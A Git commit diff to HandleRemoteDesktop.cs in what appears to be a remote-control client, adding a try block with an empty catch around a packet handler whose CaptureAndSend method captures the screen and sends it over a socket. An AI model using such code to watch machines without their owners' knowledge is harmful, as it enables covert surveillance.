Update HandleRemoteDesktop.cs

This commit is contained in:
NYAN CAT 2019-06-17 19:41:15 +03:00
parent 67836a8520
commit 049f38080c

View File

@ -17,6 +17,8 @@ namespace Client.Handle_Packet
{ {
public HandleRemoteDesktop(MsgPack unpack_msgpack) public HandleRemoteDesktop(MsgPack unpack_msgpack)
{
try
{ {
switch (unpack_msgpack.ForcePathObject("Option").AsString) switch (unpack_msgpack.ForcePathObject("Option").AsString)
{ {
@ -42,6 +44,8 @@ namespace Client.Handle_Packet
} }
} }
} }
catch { }
}
public void CaptureAndSend(int quality, int Scrn) public void CaptureAndSend(int quality, int Scrn)
{ {
TempSocket tempSocket = new TempSocket(); TempSocket tempSocket = new TempSocket();